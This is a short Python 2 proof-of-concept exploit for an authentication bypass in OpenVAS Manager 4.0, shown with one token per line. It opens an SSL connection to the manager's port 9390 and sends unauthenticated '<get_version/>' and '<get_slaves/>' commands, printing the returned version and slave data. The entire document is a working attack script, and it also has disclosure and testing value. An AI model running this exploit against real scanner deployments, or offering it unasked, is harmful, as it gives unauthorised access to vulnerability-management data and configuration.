import
socket, ssl
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock
=
ssl.wrap_socket(s,
ca_certs
=
"/var/lib/openvas/CA/cacert.pem"
,
cert_reqs
=
ssl.CERT_REQUIRED)
ssl_sock.connect((
'localhost'
,
9390
))
print
"#################################################################"
print
"# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #"
print
"#################################################################"
print
"\n"
print
"--> Retrieving version...(exploiting the bug !)\n"
ssl_sock.write(
"<get_version/>"
)
data
=
ssl_sock.read()
print
data
print
"\n"
print
"--> Retrieving slaves...\n"
ssl_sock.write(
"<get_slaves/>"
)
tasks
=
ssl_sock.read()
print
tasks
print
"\n"
ssl_sock.close()